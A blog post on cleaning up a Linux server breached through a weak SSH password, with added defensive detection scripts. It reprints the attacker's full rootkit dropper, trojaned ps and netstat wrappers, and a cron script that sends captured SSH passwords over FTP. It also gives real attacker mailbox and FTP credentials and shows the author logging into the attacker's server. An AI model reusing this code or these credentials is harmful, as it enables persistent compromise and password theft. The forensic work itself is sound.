One day a server that a buddy of mine looks after got compromised through a weak SSH password (once again a matter of perimeter security awareness). The abnormal process information looked like this:
Looking at open files with lsof, these things turned up under /dev/g
Then, out of habit, I listed the commands sorted by time, because root had already been taken and the binaries could very well have been modified. ps and netstat were both tiny, which is far from normal.
-rwxr-xr-x 1 root root 78 Apr 30 2016 /bin/netstat
strings netstat
#!/bin/sh
for arg in "$*";do
.Fnetstat $arg|grep -v "125.77.31.197";done;exit
So what actually gets executed is Fnetstat.
ps was replaced as well; what ultimately runs is Fps.
[root@localhost tmp]# strings /bin/ps
#!/bin/sh
for arg in "$*";do
.Fps $arg|grep -v ".syslogd--system"|grep -v "a8137c40f9"|grep -v "ps"|grep -v "grep"|grep -v "nslookup"|grep -v "mail";done;exit
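The two wrappers above follow the same pattern: a shebang, a "for arg" loop, and a call to a hidden dot-file binary whose output is piped through one or more grep -v filters. The following script is an added example of mine, not something from the original post: it tells an ELF executable from a shell wrapper by its first bytes, and for a wrapper it pulls out the real program it calls and every string it hides. The function names are my own, and the demo files are constructed copies of the ps wrapper quoted above written to a temporary directory.

```shell
#!/bin/sh
# Added example (not from the original post): classify a tool binary such as
# ps, netstat or ss and, when it turns out to be a shell wrapper like the ones
# above, report which hidden program it really runs and which strings it
# filters out of the output with grep -v. Function names are my own.

# Print "elf", "script" or "other" for the file $1, based on its first bytes.
classify_binary() {
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    case "$magic" in
        7f454c46) echo elf ;;      # \x7fELF
        2321*)    echo script ;;   # "#!" shebang
        *)        echo other ;;
    esac
}

# Print the program a wrapper script actually invokes: the first word of the
# first line that is neither the shebang, the "for arg" loop header nor "exit".
wrapper_target() {
    grep -v '^#' "$1" | grep -v '^for ' | grep -v '^exit' | head -n 1 \
        | cut -d'|' -f1 | cut -d' ' -f1
}

# Print, one per line, every pattern the wrapper removes with grep -v "...".
wrapper_hidden_patterns() {
    grep -o 'grep -v "[^"]*"' "$1" | sed 's/^grep -v "//; s/"$//'
}

# Number of hidden patterns (wc -l output normalised to bare digits).
wrapper_hidden_count() {
    wrapper_hidden_patterns "$1" | wc -l | tr -d ' '
}

# Check a list of tools and describe any that are not ELF executables.
scan_tools() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        kind=$(classify_binary "$f")
        if [ "$kind" = script ]; then
            printf '%s: shell wrapper running %s, hiding %s pattern(s): %s\n' \
                "$f" "$(wrapper_target "$f")" "$(wrapper_hidden_count "$f")" \
                "$(wrapper_hidden_patterns "$f" | tr '\n' ' ')"
        elif [ "$kind" != elf ]; then
            printf '%s: not an ELF executable (%s)\n' "$f" "$kind"
        fi
    done
}

# Constructed demo: a copy of the /bin/ps wrapper quoted above, plus a fake
# ELF header, written to a temporary directory so this runs offline.
demo_dir=$(mktemp -d)
cat > "$demo_dir/ps" <<'EOF'
#!/bin/sh
for arg in "$*";do
.Fps $arg|grep -v ".syslogd--system"|grep -v "a8137c40f9"|grep -v "ps"|grep -v "grep"|grep -v "nslookup"|grep -v "mail";done;exit
EOF
printf '\177ELF\002\001\001' > "$demo_dir/good_ps"
scan_tools "$demo_dir/ps" "$demo_dir/good_ps"
```

On a live host you would call scan_tools /bin/ps /bin/netstat /usr/sbin/ss /usr/bin/lsof and compare against the package manager (rpm -V procps net-tools, or debsums) rather than trusting file size alone, since the hidden patterns tell you exactly which process names and addresses the attacker wanted to keep out of sight.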
Under cron.hourly there were three scripts: mail.sh, mail.py and ssh_deny.sh.
Let's look at ssh_deny.sh first.
/dev/black.txt records the IPs with failed SSH logins and the number of failures.
pt is the SSH listening port.
The script's job is to use iptables to block any IP with more than 3 failed logins.
mail.py is a mail-sending script; it sends /dev/1.txt out.
Two accounts can be seen in the script:
user='success501@163.com',passwd='ff1314'
and a QQ mailbox, 995999349@qq.com.
Then mail.sh:
#!/bin/bash
S=`date +%s%N | md5sum | head -c 10`
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
pt=`netstat -ntlp | awk '!a[$NF]++ && $NF~/sshd$/{sub (".*:","",$4);print $4}'`
Add=`nslookup www.1024kbs.com|grep "Address: "|awk '{print $2}'`
mv /dev/1.txt /dev/"$ip"+1+"$pt"+"$S".txt;mv /dev/2.txt /dev/"$ip"+2+"$pt"+"$S".txt
curl -u root:ff1314 -T "{/dev/"$ip"+1+"$pt"+"$S".txt,/dev/"$ip"+2+"$pt"+"$S".txt}" ftp://$Add:888
rm -rf /dev/"$ip"+1+"$pt"+"$S".txt /dev/"$ip"+2+"$pt"+"$S".txt
So it renames /dev/1.txt and /dev/2.txt, uploads them to an FTP server and then deletes them. Presumably an SSH backdoor had been installed and 1.txt and 2.txt are the files it records passwords into, but my buddy's colleague had already reinstalled SSH, so that could no longer be seen. So let's log in to the FTP server and have a look. On the FTP server there were several password files:
ftp> open www.1024kbs.com 888
Connected to www.1024kbs.com (118.193.212.86).
220 Welcome to www.Gxnn.com FTP Server!
Name (www.1024kbs.com:root): root
331 Password required for root
Password:
230 User successfully logged in.
Remote system type is Base.
ftp> ls
227 Entering Passive Mode (118,193,212,86,4,88).
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 7 Nov 18 11:52 116.211.17.5+1+22+426e95d58e.txt
-rwx------ 1 user group 6 Nov 18 11:52 116.211.17.5+1+22+9ada1f5efb.txt
-rwx------ 1 user group 32 Nov 18 14:48 116.211.17.5+1+22+b500d80263.txt
-rwx------ 1 user group 7 Nov 18 11:52 116.211.17.5+2+22+426e95d58e.txt
-rwx------ 1 user group 6 Nov 18 11:52 116.211.17.5+2+22+9ada1f5efb.txt
-rwx------ 1 user group 50 Nov 18 14:55 221.229.164.18+1+22+8e46e6b7d4.txt
226 Transfer complete.
ftp>
SSH credentials of yet more victims. Searching for 995999349 turned up an article, http://blog.chinaunix.net/uid-25057421-id-5195167.html, which contains the attacker's script.
#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
path=`pwd`
exit0="exit 0"
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
LockAngel="/usr/bin/zfgsr"
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
allow="/etc/allow.bak"
Fconfig="/sbin/Fconfig.n"
S99="/etc/rc.d/init.d/S99.25000"
if [ ! -f "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi
Address1=`nslookup www.120kongbao.com|grep "Address: "|awk '{print $2}'`
if [ -z "$Address1" ];then
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30" /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi
Ftempbash=`cat $Fconfig | awk '{print $2}'` #current script file name
Fbashtemp="/usr/bin/"$Ftempbash #current script path
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname #new script path
if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi
# -------------------------------------------------------------
if [ ! -f "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30" $LockAngel
touch -d "2011-06-7 08:10:30" /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
zfgs +ia $LockAngel >/dev/null 2>&1
fi
#delete the original chattr command and copy chattr to /usr/bin/.zfgsr and /usr/bin/zfgsr; give /usr/bin/zfgsr the a and i attributes so it cannot be appended to, deleted or modified
if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi
#modify the ss command
if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi
#modify netstat
if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi
#modify the ps command, suppressing ps, grep etc. from its output
if [ ! -f "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
fi
if [ ! -f "$MyFileAngel" ];then
zfgs -i /usr/bin/wget
zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
wget -P /etc/ http://www.120kongbao.com:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi
if [ ! -f "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi
iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# autostart------------------
if [ ! -f "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides: $Ftempbash" >> $S99
echo "# Required-Start: " >> $S99
echo "# Required-Stop: " >> $S99
echo "# Default-Start: 1 2 3 4 5" >> $S99
echo "# Default-Stop: " >> $S99
echo "# Short-Description: $Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "stop)" >> $S99
echo " ;;" >> $S99
echo "*)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit
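The attacker's script above is a handy checklist for cleanup, because every file it creates, renames or locks is named in the variables at its top. The following sweep is an added example of mine, not part of the original post or of the attacker's code: it walks a root directory (the live system when the argument is empty, or a mounted image or constructed tree otherwise) and prints one FOUND line for each indicator the dropper and the cron.hourly scripts leave behind. The function names are my own, and the demo tree at the bottom is constructed, with a placeholder in place of the FTP password.

```shell
#!/bin/sh
# Added example, not part of the original post: sweep a host, or a mounted
# image / constructed tree given as $1, for the artifacts the dropper above
# leaves behind. The paths come from the variables at the top of that script;
# the function names are my own.

DROPPER_PATHS="/usr/bin/.Fss /usr/bin/.Fps /usr/bin/.Fnetstat \
/usr/bin/dpkgd /usr/bin/zfgsr /usr/bin/.zfgsr \
/etc/init.d/.dbus-daemon--system /usr/bin/.dbus-daemon--system \
/usr/bin/.dbus-daemon--system.bak /etc/allow.bak \
/sbin/Fconfig.n /etc/rc.d/init.d/S99.25000"

# Print one "FOUND ..." line per indicator. $1 is the root to inspect;
# leave it empty to inspect the live system.
sweep_dropper_artifacts() {
    root=${1:-}
    for p in $DROPPER_PATHS; do
        if [ -e "$root$p" ]; then echo "FOUND dropper file $p"; fi
    done
    # The dropper copies chattr to /usr/bin/zfgsr and then deletes the original.
    if [ -e "$root/usr/bin/zfgsr" ] && [ ! -e "$root/usr/bin/chattr" ]; then
        echo "FOUND chattr missing while its renamed copy /usr/bin/zfgsr exists"
    fi
    # ps, netstat and ss must be ELF binaries; a shebang means a wrapper.
    for t in /bin/ps /bin/netstat /usr/sbin/ss; do
        [ -f "$root$t" ] || continue
        if [ "$(head -c 2 "$root$t")" = '#!' ]; then
            echo "FOUND $t replaced by a shell wrapper"
        fi
        # The dropper locks its files with +ia; lsattr may be absent on a minimal box.
        if command -v lsattr >/dev/null 2>&1 &&
           lsattr -d "$root$t" 2>/dev/null | awk '{print $1}' | grep -q '[ia]'; then
            echo "FOUND immutable/append-only attribute on $t"
        fi
    done
    # mail.sh ran from cron.hourly and pushed /dev/1.txt and /dev/2.txt over FTP.
    for c in "$root"/etc/cron.hourly/*; do
        [ -f "$c" ] || continue
        if grep -q 'ftp://' "$c"; then echo "FOUND cron.hourly script $c uploads to FTP"; fi
    done
    # Regular files in /dev (black.txt, 1.txt, 2.txt above) do not belong there.
    find "$root/dev" -maxdepth 1 -type f -name '*.txt' 2>/dev/null \
        | sed "s|^$root|FOUND regular file in /dev: |"
    return 0
}

# Number of FOUND lines, for scripting a pass/fail decision.
sweep_count() {
    sweep_dropper_artifacts "$1" | grep -c '^FOUND' || true
}

# Constructed demo tree with a handful of the indicators planted.
demo=$(mktemp -d)
mkdir -p "$demo/usr/bin/dpkgd" "$demo/bin" "$demo/dev" "$demo/etc/cron.hourly"
printf '#!/bin/sh\nfor arg in "$*";do\n.Fps $arg|grep -v "ps";done;exit\n' > "$demo/bin/ps"
printf '#!/bin/bash\ncurl -u root:PLACEHOLDER -T /dev/1.txt ftp://ftp.example.invalid:888\n' \
    > "$demo/etc/cron.hourly/mail.sh"
: > "$demo/usr/bin/zfgsr"
: > "$demo/dev/1.txt"
sweep_dropper_artifacts "$demo"
```

Because the dropper sets +ia on its files with the renamed chattr, plain rm will fail during cleanup; the renamed copy (/usr/bin/zfgsr or /usr/bin/.zfgsr) or a chattr reinstalled from the e2fsprogs package has to clear the attributes first, and ps, netstat and ss should then be restored from the package manager rather than from the /usr/bin/dpkgd backups the attacker left, since those cannot be trusted either.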
Copyright: 8090社团 >> Notes from helping a friend with Linux incident response
Link to this article: https://www.8090st.com/server-ssh-weak-password.html. Please credit the source when reposting.